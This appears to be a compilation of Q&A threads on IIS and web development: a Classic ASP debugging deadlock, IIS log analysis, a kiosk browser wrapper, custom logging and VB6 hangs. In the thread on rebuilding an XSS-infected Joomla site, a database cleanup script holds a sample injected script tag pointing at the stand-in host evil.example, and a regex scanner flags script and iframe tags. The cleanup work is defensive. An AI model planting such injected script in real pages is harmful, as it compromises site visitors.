Classic ASP: avoiding deadlock when debugging - IIS

We have a classic ASP page that makes a request to another page on the same site to get data.
When debugging is turned on, we get a deadlock because the web server will only respond to one request at a time.
What is the best way to get around this limitation while still allowing us to debug during development?
Less than ideal options:
Move the page to another site.
Allow IIS to use multiple processes.
Any other options?
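For what it's worth, the failure mode isn't IIS-specific: any server with a single request worker that makes a blocking request back to itself will hang, which is presumably why both workarounds above help - they give the nested request a different worker. A minimal sketch of the same deadlock in Python (the port and paths are placeholders; this illustrates the problem, it isn't a fix):

    # Minimal, IIS-free illustration of the deadlock. HTTPServer handles one
    # request at a time, like ASP with debugging enabled: requesting "/" makes
    # the handler call back into the same server, which can never respond.
    from http.server import BaseHTTPRequestHandler, HTTPServer
    from urllib.request import urlopen

    class Handler(BaseHTTPRequestHandler):
        def do_GET(self):
            if self.path == "/data":
                body = b"the data the outer page wanted"
            else:
                # Deadlock: the single worker is busy right here, so the
                # nested request below is never picked up.
                body = urlopen("http://127.0.0.1:8000/data").read()
            self.send_response(200)
            self.end_headers()
            self.wfile.write(body)

    HTTPServer(("127.0.0.1", 8000), Handler).serve_forever()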

Ah, the joys of Stack Overflow, where instead of getting answers you're criticized for using Classic ASP, which is a currently supported tool even though it's been around for 100 years. :-)
I ran into a similar problem a while back while trying to create a simple script that would mimic the behavior of a script located on another server. I wanted to do some debugging without invoking the real script, so I thought I'd make a brain-dead replacement for it on my own server and invoke it the same way.
I ended up giving up and using the real script for my debugging. But today I found this KB article for you that might help: http://support.microsoft.com/kb/316451. I'm not sure, but I think that's the solution, or something close to it.


What are the tools to parse/analyze IIS logs - ideally free/open source?

Note: there are a few similar questions already asked here, but they are from 2009. Maybe something has changed since then.
I'm responsible for a bunch of websites hosted on different servers. I do not do any log analysis right now, but I would like to change this. First question: what is the best tool to view issues with a website based on IIS logs (e.g. 404 and 500 responses, long page processing times)? Ideally with grouping/sorting options. I do not want to spend a lot of time on this; I just want to periodically check that all is good with the website.
Second question (and I know I'm most likely asking for too much): is there any way to expose the processed logs to the web, so I can review the things mentioned above without RDPing into the server?
Ideally I'm looking for a free/open source solution, but I'm ready to pay for good software as well (just not a lot of $$).
Thank you.
You can take a look at our log monitoring solution EventSentry, which can monitor text-based logs like IIS logs. We have standard templates set up for IIS, and we can consolidate the logs in a database with web access, so that you can review the logs without using RDP.
It's a pretty flexible solution that allows you to pick the fields you are interested in, and ignore the ones you are not - and thus save space in your database.
You can also set up real-time alerts, so that you get an email when a critical error, like a 500, is encountered in a log file.
http://www.eventsentry.com/features/log-file-monitoring
Finally, you can also plug in command line tools which can verify that a given web page is accessible, or alert you when it changes: http://www.eventsentry.com/features/application-monitoring.
I'm biased of course, but I would say that our solution is pretty affordable. Since it also offers additional functionality, such as service monitoring (to monitor your IIS services) and event log monitoring (IIS does log critical messages to the event log), you can set up comprehensive monitoring with a single product.
I'd look into @LuckyLuke's solution (or similar) - the classic "build vs buy" decision. Based on your post, this isn't going to be your "full time" job, so IMHO it's best to leave it to those who do it full time...
I don't know what "legacy" answers you are referring to, but if you want to tinker you can use Microsoft's own Log Parser, and depending on how far you want to go with it, you can use it (it's a COM DLL) to write your "admin web pages" in .NET/ASP.NET and host them on each of your servers...
If you only care about specific errors, another "hacky" way would be to provide your own custom error pages (either override the default IIS error pages, or configure your ASP.NET apps to use specific error pages).
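If you do end up tinkering, a few lines of script are enough to summarize error responses straight from the W3C logs. A rough sketch in Python (the log directory is an assumption - adjust it to where your IIS version writes its logs - and the field names are read from the #Fields header IIS puts in each file):

    # Quick error summary from IIS W3C logs: top URLs by 404/500 count.
    import collections
    import glob

    counts = collections.Counter()
    for path in glob.glob(r"C:\WINDOWS\system32\LogFiles\W3SVC1\*.log"):
        fields = []
        with open(path, encoding="ascii", errors="replace") as f:
            for line in f:
                if line.startswith("#Fields:"):
                    fields = line.split()[1:]  # e.g. date time cs-uri-stem sc-status ...
                elif not line.startswith("#") and fields:
                    row = dict(zip(fields, line.split()))
                    if row.get("sc-status") in ("404", "500"):
                        counts[(row["sc-status"], row.get("cs-uri-stem", "?"))] += 1

    for (status, url), n in counts.most_common(20):
        print(f"{n:6d}  {status}  {url}")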

Kiosk program (web browser), deployment struggles

Okay, here's a complicated one I've been racking my brain over all week.
I'm creating a self-service system which allows people to identify themselves by barcode or by smartcard and then perform an arbitrary action. I run a Tomcat application container locally on each machine to serve up the pages and connect to the external resources that are required. It also allows me to serve webpages which I can then use to display content on the screen.
I chose HTML as a display technology because it gives a lot of freedom as to how things can look. The program also involves a lot of JavaScript to interact with the customer and the hardware (through a RESTful API). I picked JavaScript because it's a natural complement to HTML and is supported by all modern browsers.
Currently this system is being tested at a number of sites, and everything seems to work okay. I'm running it in Chrome's kiosk mode, which serves me well, but there are a number of downsides. Here is where the problems start. ;-)
First of all, I am petrified that Chrome's auto-update will eventually break my JavaScript code. Secondly, I run a small Chrome plugin to read smartcard numbers, and every time the workstation is shut down incorrectly Chrome's user profile becomes corrupted and the extension needs to be set up again. I could easily fix the first issue by turning off auto-update, but that complicates my installation procedure.
Actually, having to install any browser complicates my installation procedure.
I did consider using Internet Explorer, because it's basically everywhere, but with three dominant versions out there I'm not sure it's a good approach. My JavaScript is quite complex, and making it work on older versions will be a pain. Not to mention having to write an ActiveX component for my smartcards.
This is why I set out to make a small browser wrapper that runs in full screen and can read smartcard numbers. This also has downsides. I use Qt: Qt's QtWebKit weighs a hefty 10MB, and it adds a number of extra dependencies to my application.
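For comparison, the wrapper idea itself is only a few lines in Python with PyQt5 (an assumption on my part: PyQt5 with the QtWebEngine module installed, and the URL is a placeholder for the local Tomcat page). It doesn't solve the size problem - a bundled Chromium engine is even heavier than QtWebKit - but it shows how little glue code the wrapper needs:

    # Minimal full-screen browser wrapper (assumes PyQt5 + PyQtWebEngine).
    import sys

    from PyQt5.QtCore import QUrl
    from PyQt5.QtWidgets import QApplication
    from PyQt5.QtWebEngineWidgets import QWebEngineView

    app = QApplication(sys.argv)
    view = QWebEngineView()
    view.load(QUrl("http://localhost:8080/kiosk"))  # placeholder: local Tomcat page
    view.showFullScreen()                           # kiosk-style, no window chrome
    sys.exit(app.exec_())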
It feels like I have to pick from three options that all have downsides. It's something I should have investigated before I wrote the entire program. I guess it's a lesson well learnt.
On to the questions:
Is there a pain-free way out of this situation? (probably not)
Is there a browser I can depend on without adding tens of megabytes to my project?
Is there another alternative you could suggest?
If you do not see another way out, which option would you pick?

How can I browse an XSS infected Joomla website for rebuilding purposes without being infected?

Both the web files and the database have been tampered with to point to malicious JavaScript. They have tasked me with rebuilding their site, but I would like to be able to view it if possible to get at the content, since the site has a lot of pages. As I didn't originally build the site, I don't know the structure of the content.
I don't have to repair the site; I just need to rebuild it with the CMS of my choice. I don't know anything about the Joomla database, or whether I can even get access to it to start there.
I originally thought using a virtual machine would be OK for this, but I wasn't sure if I would be risking my host machine as well with this method. I would of course turn off JavaScript, but I was hoping someone else may have already been down this road and might be able to offer some insight.
Couldn't you just FTP to their host, pull it off and get it working on a machine with no connection?
That's if you were really paranoid; I don't think an XSS-infected site would do too much damage to a properly protected machine anyway.
My paranoid answer:
It's a great idea to turn off JavaScript. I would get an extension like NoScript for Firefox or NotScripts for Chrome. I use NoScript regularly, and it makes it easy to see what JavaScript is coming from where.
Secondly, your idea of a VM is good, but take it a step further and run Linux in that VM. Linux can be infected, but malware that targets it in the wild is rare.
Regular expressions and HTML parsers can also be your friends. Script something that can scan files looking for things like script tags and especially iframes. That way you can get an idea of which files have been corrupted and what is calling out to where.
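A minimal sketch of that kind of scan in Python (the directory and extension list are placeholders; the pattern is deliberately loose, so review the hits by hand):

    # Walk a copy of the site and flag <script>/<iframe> tags for manual review.
    import pathlib
    import re

    TAG = re.compile(r"<\s*(script|iframe)\b[^>]*>", re.IGNORECASE)

    for path in pathlib.Path("site_backup").rglob("*"):
        if path.suffix.lower() in {".php", ".html", ".htm", ".js"}:
            text = path.read_text(errors="replace")
            for match in TAG.finditer(text):
                line_no = text.count("\n", 0, match.start()) + 1
                print(f"{path}:{line_no}: {match.group(0)[:80]}")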
One other less likely gotcha is malicious executables or scripts disguised as something innocent like JPEGs, PDFs, etc. If you download and open files off of that machine, make sure you at least do it inside your VM, with no network connectivity.
Get server logs if you can; perhaps your assailant was sloppy and left some clue about their activities. Perhaps run Wireshark on a second machine to look for things calling out to strange domains. This may be excessive, but I find it to be a fun exercise. :)
Also, things like VirusTotal and ThreatExpert can be your friends if you think you have a malicious file or you see malicious activity. Better to be paranoid than compromised.
Cleaning this type of stuff up isn't exactly rocket science. You just need to get a connection to the backing database server and run a couple of queries to strip the XSS payloads out of the stored content.
You'd do your client a great service by starting off doing just that.
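As a sketch of what that cleanup can look like, driven from Python with pymysql - every name here is an assumption (jos_content, introtext and fulltext are Joomla 1.5 defaults, and the payload string is whatever you actually found), so verify against the real schema and back up the database first:

    # Strip a known injected snippet from stored Joomla content.
    import pymysql

    PAYLOAD = '<script src="http://evil.example/x.js"></script>'  # the string you found

    conn = pymysql.connect(host="localhost", user="joomla",
                           password="secret", database="joomla")
    with conn.cursor() as cur:
        for col in ("introtext", "`fulltext`"):  # FULLTEXT is a reserved word in MySQL
            cur.execute(f"UPDATE jos_content SET {col} = REPLACE({col}, %s, '')",
                        (PAYLOAD,))
    conn.commit()
    conn.close()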
The VM idea is a good one. krs1 suggests running Linux, which is an even better idea, as almost all trojans that get downloaded are for Windows. Run Wireshark while you use the site so you can see what the network traffic looks like and which URLs are being requested. If you run it in a Linux VM, though, you'll probably only get half the picture, since any exploit worth the oxygen it took to keep the programmer alive while it was written will check what platform you're on and only download when you're on an exploitable one.
But I digress, you're rebuilding a website, not doing malware analysis (which is more fun IMO). Once you identify and remove the offending content you should be good. See if you can find out what the exploit was that got them and work with their IT guy if they have one so steps can be taken to mitigate it from happening again.

How to write my own Server Logging script?

I need to log the hits on a sub-domain in Windows IIS 6.0 without designating it as a separate website in IIS Manager. I have been told this is not possible. How can I write my own script to do this?
I'm afraid Google Analytics is not an option due to the setup; I just need access (I'm guessing) to the file request event and its properties.
Wyatt Barnette - I've thought of this! But how do I set those properties so it collects them all? I'm writing my own log-parsing software, as I need specific things; I just need the server to generate the logs for me to parse!
Have you considered using Google Analytics across all your sites? I know that this is not true logging...but sometimes addressing simple problems with simple solutions is easier! Log parsing seems to be slowly fading away...
What you should be able to do is have your stats tracking package look at multiple IIS websites as a single site.
If your logging package can't handle this, check out the IIS log parsing tool. That should at least take care of the more onerous part of the task (actually making sense of the logfiles). From there it is a pretty straightforward reporting operation.
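One more tinkering option: IIS 6's W3C Extended logging has an optional Host (cs-host) field. If you enable it in the site's logging properties, every hit records which sub-domain it was for, and splitting the shared log back out becomes a short script. A sketch in Python (the file name is a placeholder; field positions come from the #Fields header):

    # Count hits per sub-domain from a shared IIS W3C log via cs-host.
    import collections

    hits = collections.Counter()
    fields = []
    with open("ex080101.log") as f:  # placeholder log file name
        for line in f:
            if line.startswith("#Fields:"):
                fields = line.split()[1:]
            elif not line.startswith("#") and fields:
                row = dict(zip(fields, line.split()))
                hits[row.get("cs-host", "unknown")] += 1

    for host, n in hits.most_common():
        print(f"{n:8d}  {host}")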

IIS hang state

Any suggestions for detecting flaws in VB6 components running under IIS? IIS becomes unstable and after some time enters a hung state. The problems occur, for the most part, only in the production environment. We have many modules running; there are probably components with bugs, and we need to identify them.
Thanks in advance.
One thing to watch out for is multi-threading issues. VB6 components often don't play well when accessed by multiple threads.
If the client code is an ASP.NET application, consider putting SyncLock blocks around the calls to ensure that they are executed sequentially.
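The shape of that fix, sketched in Python rather than VB.NET (the component and its method are hypothetical; the point is that a single shared lock lets only one call into the component at a time):

    # Serialize all access to a component that isn't thread-safe.
    import threading

    _legacy_lock = threading.Lock()  # one lock shared by all callers

    def call_legacy(component, *args):
        # Same spirit as a VB.NET SyncLock block around the call site.
        with _legacy_lock:
            return component.do_work(*args)  # hypothetical component method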
Another sure-fire way to fubar IIS is to display a message box or initiate some other sort of user interaction. Get those MsgBox calls outa there.
Other than that... good logging helps. VB6 is pretty opaque when errors arise.
Use Debugging Tools for Windows to analyze a dump of IIS. Tess' blog is one of the best resources to learn to use WinDbg. Although she focuses on .NET debugging, most of the material is applicable to any Win32 process.
